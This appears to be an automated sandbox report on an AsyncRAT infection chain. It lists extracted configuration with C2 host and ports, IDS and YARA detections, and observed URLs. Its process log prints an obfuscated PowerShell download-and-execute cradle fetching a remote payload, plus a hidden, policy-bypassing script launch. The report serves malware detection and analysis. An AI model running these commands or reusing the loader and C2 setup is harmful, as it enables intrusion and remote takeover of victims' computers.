Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: AsyncRAT {"Server": "kareemovic11.duckdns.org", "Port": "6606,7707,8808", "Version": "AWS | RxR ", "MutexName": "AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd", "Autorun": "false", "Group": "true"} |
Source: | Binary string: NewPE2.pdb source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp |
Source: | Binary string: NewPE2.pdb(@ source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp |
Source: Network traffic | Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: Network traffic | Suricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: Network traffic | Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: Network traffic | Suricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F05D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://afclifescience-tiurma.com |
Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enqq |
Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wscript.exe, 00000000.00000002.1753518951.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.LWD |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8DB31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com |
Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/ |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659367243.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1752878264.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753459649.000002092E8C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txt |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtLMEMX |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtWRx |
Source: wscript.exe, 00000000.00000003.1660289317.0000020930687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtc |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtkR |
Source: wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtsC: |
Source: powershell.exe, 00000001.00000002.1717634059.0000021E8BE58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/rkem.jpg |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/rkem.jpgX |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8E4DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX |
Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR |
Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'" | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B821E22 | 1_2_00007FFD9B821E22 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B822964 | 1_2_00007FFD9B822964 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82458A | 1_2_00007FFD9B82458A |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82A7A2 | 1_2_00007FFD9B82A7A2 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82351A | 1_2_00007FFD9B82351A |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B825302 | 1_2_00007FFD9B825302 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B824B2A | 1_2_00007FFD9B824B2A |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD9B7F1A36 | 6_2_00007FFD9B7F1A36 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_071F1B10 | 8_2_071F1B10 |
Source: dump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, oqwGSofdlOxxXlf.cs | Base64 encoded string: 'oWqliWVaZr9X8SAKoHLtdvQ02xp8ctJW1Ws8BNgrvuiIIol+HlCUlGDdTgOl3EFn/EhvMQuzWAnpzetsGEC+aA==', 'LOlB9LxPxxiqF7JEjXHZfgxYps0j1moVQPZWxqQN5lDMDxEIFiKaejGBKqMTY2tx7JaCbg/i0v8ECQ3bnxILqg==', 'pdckQx7emwUz8cy06clwM6XKGn8yYO79fj6MH8KJTnBfY2wRgTxVafHD/2LEsJV0zZBi6EoCougzdjZUtRRz2OFNpKyWywttTSd5CnYXXFE0QNUxGrDVp/8KUixEHe55OHHORoR7zWVHVbVyQZVoFw==', ... |